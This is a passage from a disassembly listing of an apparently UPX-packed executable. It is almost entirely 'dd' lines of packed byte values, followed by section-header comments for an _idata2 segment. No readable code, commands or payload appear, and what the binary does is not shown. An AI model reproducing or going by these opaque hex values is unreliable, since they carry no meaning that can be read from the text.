dd 521C63DFh, 0A712B0EFh, 0B671FC13h, 0F37B6AEBh, 2BA28787h
dd 43C3B0BDh, 3A4A6F6Fh, 2BAB18B0h, 0D4F23737h, 0F3F6E06Fh
dd 0E619A0AEh, 58917C7Dh, 7CF7DE96h, 9A161B1Ah, 0D7D9B973h
dd 0D1ED82D2h, 8EFBF6A5h, 63657A12h, 0B2C619CEh, 0B3D375Ah
dd 0F4116009h, 3E4BC9FAh, 87B888E6h, 54A389F1h, 0D0CF7EC2h
dd 308190E5h, 0BDD7DCDEh, 0FDABAAC2h, 1EEA6BC6h, 0D8535846h
dd 17177BBBh, 0F81BD112h, 0CEA5B4B5h, 8E9E2D46h, 0F3FE8CBDh
dd 4A7B502Ah, 1E75E0BEh, 0A1C1F75Bh, 0F5F46923h, 0C64B080h
dd 6D5FA8DDh, 7170DDD3h, 119E2C1Ch, 257EFF24h, 37BFE4F8h
dd 251894F4h, 64574C30h, 0C2104C4h, 9924DAA8h, 0E0D2C7C0h
dd 84F14640h, 0A3279FAFh, 0A6BCD8B1h, 2D46C2CAh, 55571B2Bh
dd 8988BEBCh, 80AC573Ch, 7FD196A7h, 647EA7FEh, 5B0CFD3Fh
dd 9EC73829h, 0A3B38788h, 0E39FDEDFh, 1B1CE6FDh, 657F510Eh
dd 334D5A52h, 0A1F53B27h, 839D8D84h, 0EFDEEEFCh, 14F4F7h
dd 2C2A192Dh, 7A765C59h, 0B5996752h, 0CBB3B387h, 0E2F0C9C1h
dd 4012D20h, 78593722h, 7E744547h, 80B4A58Bh, 0D0D5ACBEh
dd 0FAFEC4D4h, 2F093328h, 5D553E2Dh, 69674D70h, 85A29399h
dd 0C3CEB097h, 0E5F1F9FCh, 33381E3Ch, 754E2C29h, 948B6155h
dd 0AABA9A88h, 0D4E6D8DEh, 1B12FCFFh, 23261002h, 6C7F4B59h
dd 0F3837F62h, 938DAF8Dh, 0DECDF5E5h, 0C1AC5DAh, 2C343328h
dd 40474448h, 858B6A6Bh, 0FD9FABA2h, 0F7E5DEDCh, 33DF413h
dd 55562723h, 7656744Bh, 90899789h, 0E2BABDA8h, 0EFE9D1C0h
dd 2D0D3F01h, 32344B3Dh, 0B3584F1Dh, 0A8ADFB51h, 0C3D8BEAAh
dd 0E9F1F4B7h, 2635001Fh, 44446C20h, 0B0017973h, 0F29EA9A0h
dd 0D1C8D7D9h, 1B19E4FFh
dd 0B02336Fh, 684A1A6Bh, 0D5B74742h, 0BBA494C6h, 9792C3C0h
dd 717562DDh, 0C4145E5Ch, 293DD4DDh, 8374C004h, 0C0C5EAC2h
dd 0B8B43B54h, 80AC824Fh, 5610224Ch, 0F1A0A139h, 0BDE8CDD0h
dd 0CD92ED63h, 0B211C389h, 43116488h, 18C9F0C6h, 7E87212Fh
dd 0BA7AA3F1h, 0BE364562h, 0B87ACB0h, 687044EAh, 6AA6BE43h
dd 0FE4D94EDh, 36D75A10h, 571F3270h, 147EA3BFh, 50526663h
dd 1DB3C46Dh, 1EFA3F23h, 0CBCEE36Bh, 8A0B323Bh, 19268BBAh
dd 0B844355Eh, 2B327AA7h, 0CA8E8406h, 0B3B3DFD1h, 969AA745h
dd 2928D081h, 720E137Bh, 0F83D429h, 0EDE9CED1h, 0D0A9A611h
dd 0E679F6A7h, 9D9A8580h, 61297D8h, 7ECDA721h, 36300AF7h
dd 0B2B4C9C2h, 0D9CBDBCEh, 1E72223Eh, 0D1300909h, 3228048Ch
dd 2F9604EDh, 1F263F3Eh, 7E4FB86Ah, 52526C01h, 0B3D86A3Dh
dd 0F9CB3C30h, 0CDCFE90Ch, 0F3E7E4B8h, 2732DAC5h, 1D0E3C33h
dd 0E2493477h, 0C0D8E19Dh, 0C4C034DBh, 0D0C7B0AFh, 3F3BD7CCh
dd 0D5BC0E57h, 142707C2h, 0B9BB36CCh, 0D6EFD0B9h, 9092CFA6h
dd 9B303B7Bh, 811BEDAh, 0F3F6A023h, 6DB1D583h, 8499355Eh
dd 1304139Fh, 365D4254h, 2A591447h, 55051A1Bh, 0AD4D12BFh
dd 53ACF1EFh, 0B0AB5802h, 545F816Bh, 7B7D3D3Fh, 0C9CF4356h
dd 839CA1C8h, 0E23146BAh, 9F78BDA2h, 4B4C6168h, 6D504641h
dd 94806763h, 3998DD9Ch, 0AAB76824h, 8BF50C85h, 4D446972h
dd 4495A01Ch, 60EC3118h, 8DEC2251h, 46BF8A8h, 6558513Dh
dd 393839C3h, 0B89D2524h, 0E1D3E1A7h, 680A4195h, 618B908Ch
dd 0A2A08688h, 95B68F2Eh, 5072C3Ch, 7F7F6CA0h, 0ADAEF3E4h
dd 0A1E60215h, 1066B5Ch, 29403E2Ah, 0FCFC7B46h, 452D67E7h
dd 0A496975Ah, 0D204F0Ah, 0DBC3EE41h, 72220717h, 467B0D61h
dd 0C7FAFF7Ah, 0CBCEE5E6h, 0FA8DD5D7h, 437677BFh, 0CA8FD076h
dd 2CEE332Eh, 8EEC2950h, 0FC7EABA9h, 9995808Fh, 0A2C2EDCh
dd 4297E025h, 0B4E5CAECh, 5E8A9199h, 757250F8h, 4B2DF3B2h
dd 66634A79h, 4CE12A42h, 1D230E03h, 9EA58940h, 0DDFCCF99h
dd 0A4638559h, 0AFEBBEBEh, 0FE300059h, 86A28CBFh, 2325748Eh
dd 7A4CA1DEh, 1F013434h, 73756869h, 0D9CD98F2h, 5C33E1D0h
dd 9D909999h, 46B6149h, 4544B528h, 514F3130h, 0BCB15248h
dd 8C80F79Eh, 167ADE7h, 685CAD3Eh, 3C4059BBh, 435C7A27h
dd 85B1889Eh, 0F9DEA5A3h, 1970F4A3h, 605353AEh, 0CB82C1D8h
dd 600B1033h, 0DCDEF33Bh, 4FB2AD91h, 0B4AA820Eh, 8ACFE26Fh
dd 0A12E735Ch, 302FD0AAh, 8387BCEBh, 834C2B40h, 0B8FE92A3h
dd 0BFC4EB6Bh, 74250A24h, 0A1F86458h, 0CBCF8AB0h, 4C5E36B6h
dd 8C8F9762h, 75F4DDA1h, 1B1D0227h, 66990D72h, 3DC5DACAh
dd 0A6B5C738h, 6A616A81h, 6D165655h, 215E6966h, 0AAACD3CFh
dd 2F43D19Dh, 8EA089E4h, 626311EAh, 83B54D4Dh, 0A3C3997h
dd 736279ACh, 5AB3F8E5h, 79786D11h, 5A5B7C99h, 60661345h
dd 56465650h, 9A9AAFC3h, 0EB3F40C1h, 0FB7EA3B9h, 67D668A9h
dd 0B5263B3Fh, 0F9FA0A79h, 397B6EE4h, 0F8A287A0h, 59BF3601h
dd 1CA25F50h, 9EE1CCC5h, 0C0DECAB5h, 40C9DBDBh, 989AADBFh
dd 6DFE6F02h, 28165757h, 14162A2Ah, 0C4446B00h, 783CD2E3h
dd 9091A737h, 0EB1F12Bh, 0ADC61C4Fh, 0C3D0EEEh, 95B93572h
dd 0A73CA1C6h, 1D779D9Fh, 5C6C5D1Ah, 8DB3A7ACh, 43439BDh
dd 55FE99EFh, 9C8B6A46h, 1580C497h, 546344D2h, 0AC28FCBAh
dd 0FBFB119Ah, 44C3A46Dh, 2C9347BAh, 47572A0Bh, 0B5CEA662h
dd 1E1F0418h, 0F3990860h, 5338DEB7h, 9AAB9C74h, 61907C06h
dd 424238DDh, 839ABF2Dh, 0E9DB20A3h, 0EEEDC4BEh, 0BD263D57h
dd 0A5E27C4Ch, 387BD55Fh, 0B0822424h, 0E1D2D73Ch, 0C45EC37Dh
dd 0E1756056h, 5D5E73E0h, 0B8D46C16h, 0FA523F28h, 0E9F5DF65h
dd 7F104FC4h, 3081A6B8h, 0A307826Dh, 0BCA4C1BFh, 0FCCD32ABh
dd 0C4B9E68Dh, 0F6A5BABBh, 0B9EC71DCh, 0C14D524Fh, 0AD351273h
dd 0C3C5459Eh, 71C68EDEh, 0BFD939B8h, 67914792h, 51441058h
dd 5D0B2C64h, 0CEA90901h, 0B12056DDh, 0C39D4A68h, 764D3A76h
dd 0B76D60AEh, 3E3DD998h, 0E2F811F9h, 989DCDCDh, 0A4ACD997h
dd 64405B55h, 1C116C6Ch, 7E2D6525h, 0D0A8D5D1h, 0E0E68B8Fh
dd 7DD498B9h, 667C89F8h, 86EFC141h, 97FF1415h, 8284B8E8h
dd 89662943h, 0F4F090A0h, 4D7F7156h, 3AC03852h, 0A5FAC567h
dd 0C8CBE537h, 0F8BA92B3h, 8F24888Dh, 746CB9CEh, 14DFB32Fh
dd 83E4EF53h, 0BFC3D8DEh, 0B34F1127h, 343C804Eh, 17FEC1ADh
dd 0CF962816h, 566BAF84h, 0B78AE331h, 9EBC0621h, 0D2627746h
dd 318B5C7h, 6DC4341Eh, 888BA3F2h, 830C5339h, 7B069AAAh
dd 0C676106Eh, 9EA0BCC9h, 0FF313AE9h, 7D27E75Ah, 4FC9AECBh
dd 848264C8h, 0AC461407h, 2252B733h, 3972E4E5h, 77402CCAh
dd 9E919A4Ah, 85F22E7Ah, 0B91AE7B6h, 2A3183A4h, 824C8605h
dd 0C0C5EACDh, 0A5F184D8h, 966D82F5h, 0D6D3FC1h, 0EFA8AA28h
dd 0E5E8CDD2h, 3C7BC0A4h, 8DA08502h, 61647978h, 1BC6C88Ah
dd 0E00C2110h, 22200AFCh, 0B1B70A95h, 0AB782911h, 0A60D7040h
dd 1D0349D1h, 0FEFB9B18h, 0D56D6FE3h, 2C23BFC0h, 7D4EA397h
dd 0AE046702h, 150A66A9h, 0F73A8A10h, 0CCCE4767h, 0F0629CB7h
dd 2475E1DBh, 48225E35h, 4ADE3333h, 0C40392F8h, 3B45DBEAh
dd 0A51EA051h, 0E26E8386h, 0F7250D3h, 189BA62Ah, 6AE9CECEh
dd 8B8DC147h, 0E5C3F7A6h, 0F69A2A7Ah, 3709625Bh, 4F2DAA1h
dd 0DFE4F572h, 4CB4A3CAh, 0B7B89A2Bh, 4AC98E72h, 0AC30756Ah
dd 870BE6E2h, 0D7D7EF07h, 9BB0454Bh, 0B64C94A6h, 302AB69h
dd 7623566Fh, 0CAFCA5EDh, 5B30E4D5h, 0A293934Ch, 0F2784C08h
dd 4A4B63A4h, 9B96FD06h, 0F1C33816h, 0AD968D8Dh, 9994B0AFh
dd 28FA7BD4h, 0C4436874h, 6B9323ECh, 61EB0003h, 8C8FF756h
dd 0DB186BA7h, 434C443h, 0EA08504Fh, 0FDF8E520h, 656B1600h
dd 0B486FBE4h, 30B6D414h, 5C5E68BFh, 0F1319574h, 0E5F1EAECh
dd 0E8FE6B66h, 0A36EC2F3h, 7987DD20h, 7D85C88h, 6B9E3127h
dd 0B22D1107h, 0CCF9278Dh, 0FC9F3B6Ah, 8E17E7F9h, 0C8047C16h
dd 6D203A4Ch, 0CEBE81D5h, 0C5DD9C56h, 0DE10A2F3h, 0B78679CDh
dd 0C77E9B7Ah, 16291E36h, 0AD665BC2h, 3548DAF0h, 9195AA10h
dd 54AABE4Fh, 9136562h, 3C3F160Ah, 0AA90B7D8h, 0C5D4A3BEh
dd 0E7E58FC1h, 576D1A12h, 575D756Bh, 60657C6Eh, 0BAA983D0h
dd 0D9C7E6F9h, 0AEB9E8ECh, 1E232243h, 59472E32h, 92963A75h
dd 0A2FC8781h, 0CD9893D8h, 5859A1B2h, 382B0D14h, 12055Fh
dd 949E6963h, 0F6F694B6h, 0E2EBC792h, 4D4EEDEAh, 27353338h
dd 2721424Bh, 0C5D33A20h, 0DFB1BEBCh, 9FA9C9C4h, 0ED950B77h
dd 0A0F4FDCh, 8D5D9825h, 4C14FF10h, 893BC6B8h, 0E4FCE8D5h
dd 0D5A18300h, 29BBC0B7h, 0B60A2F2Dh, 0DF3471CDh, 40C46837h
dd 0F7AAA519h, 571EE59Ah, 0F5F29D64h, 0B1432BCAh, 3AA0B3ADh
dd 4E5795F2h, 7A7D90BDh, 4E513E0Dh, 0D3CD6139h, 8106F1F0h
dd 0D24069C0h, 10A18684h, 0BE5E8BBCh, 7675D312h, 9EB9C1CDh
dd 0ED8F8BDDh, 0E7706F5Ah, 6765AE9Bh, 0A7E641DBh, 81CC5DB8h
dd 102504D8h, 0D7377607h, 0D9807D06h, 0F6ACA3D1h, 40487B00h
dd 406471E1h, 7C221DF3h, 0A9DFC82Eh, 3B8E2B2Fh, 0D7025A9Ah
dd 585B405Fh, 6977017Eh, 3D316C17h, 0D484A8B8h, 578F94CBh
dd 417E6C6Ch, 501F332Fh
dd 741B294Fh, 83FA5F47h, 988FDEE9h, 1AADB7E6h, 8C8975CBh
dd 7719DAA0h, 28F53302h, 110C98EFh, 0FFC55026h, 0D5D4E6FAh
dd 9449078Eh, 697FA8AAh, 1D587E6Ah, 1917E279h, 0F9EAEF2Eh
dd 0A9E9496h, 9D9A8468h, 626A1E70h, 0C892D6Eh, 0ED1F0A0Bh
dd 4F9A2112h, 2876262h, 0A5A38C88h, 38D89776h, 0EA041919h
dd 292812B4h, 0AAABC029h, 93FEC995h, 52634150h, 26260ED4h
dd 0CB047411h, 0FDEC516Fh, 28C7B888h, 26CA0CAEh, 484B5050h
dd 0B3F73E41h, 190CF7F6h, 0C4C7DDC8h, 0D5A531C9h, 64EA8BD9h
dd 0CB435856h, 0CA141075h, 0B8D17E99h, 443BDC96h, 6792A7A7h
dd 44666D38h, 0BD354F4Fh, 0C0E23C8h, 0E2BDB501h, 0B4544EC4h
dd 0F6089E9Fh, 7C7D5253h, 0E4B54967h, 0EC051A1Bh, 27271048h
dd 0AC6543CCh, 0C20B9597h, 441EE263h, 2C5BFC14h, 0FE17D120h
dd 85592DE5h, 882130AAh, 9F78BDBEh, 0B4B39C34h, 1F209ADEh
dd 0D569820Ah, 0C5C8EDEDh, 0AAAC9A2Ch, 921E6D85h, 0C64BA6A6h
dd 16182DA2h, 0D9CFB48Ah, 0E34BD5E4h, 794AAA94h, 9A97802Bh
dd 73BD2C22h, 0D104500h, 0B71D7318h, 38A3B6CFh, 0B99BA015h
dd 4D257774h, 3135BBF1h, 0A0F44B1Ch, 0DB39EE41h, 0F3F16737h
dd 13B398CAh, 55D4ECE1h, 0A04C3F40h, 3018884h, 35020F18h
dd 2FFC4444h, 327983C5h, 4A0FEE73h, 0A90A741Ch, 0F3F6548Ch
dd 0E78C18DEh, 0BBBE9392h, 0E45ACC0Fh, 0C6CD4B10h, 172A1F09h
dd 99E6493Bh, 0B6885ED6h, 1186E9A8h, 0ED6A271Eh, 0A0E7CD4h
dd 6502625h, 0D1B5B9F8h, 9432AA1Fh, 0D28F2DC5h, 6E66CBF6h
dd 3D354A79h, 0F9F58A99h, 0F9690E0Eh, 51B0F5F5h, 0B2A8F40Ch
dd 49ED926Dh, 0D52C7171h, 0CE2BD880h, 0D95964E9h, 2BA88D8Dh
dd 4A4C8204h, 24023465h, 2591C639h, 0AF83D3Dh, 0F9E08475h
dd 9A154AB4h, 8E74B9B8h, 756390C9h, 0E6A9BC30h, 13F0352Ah
dd 0F0F4DA62h, 167FBABh, 685CAD22h, 0C47F0D0h, 0D3142917h
dd 0E4E7FC13h, 0B9D18DCFh, 0A6624922h, 903B7847h, 4CB28D44h
dd 8D0B100Ah, 145D3033h, 71BD3738h, 0B493E31Eh, 4867AC6Fh
dd 592E6943h, 7C83710Bh, 0A5B9E6CFh, 40C9ADCAh, 83826D57h
dd 0BB96312h, 0CCDAC5C6h, 806F1DDh, 0E632CC83h, 8D95E0CEh
dd 7375AF32h, 0E2A13E5Eh, 6EE2CDCDh, 0CAB58D3Fh, 3D7057E9h
dd 1D999E83h, 0EB0B8AD1h, 4D43506Fh, 127D7C0Ch, 6DE802FDh
dd 0E8BCBB15h, 27055AF5h, 0E1644955h, 8B94589h, 56331E7Dh
dd 185CF780h, 4FBB20CDh, 0F96F6362h, 3BA48F8Eh, 2E5BFC86h
dd 0B3E81819h, 0D6D6C455h, 0AABA57C1h, 5EBC9395h, 5262DF69h
dd 25CE3B3Dh, 3BFA0F11h, 9943E3C0h, 8F6FBB9Ch, 976730Fh
dd 49A23F79h, 961E3334h, 0ADC2235Ch, 2947C150h, 98AA8418h
dd 9380846Bh, 448036A8h, 150Dh dup(0)
UPX2 ends
; Section 4. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31439000h
align 2000h
_idata2 ends
end start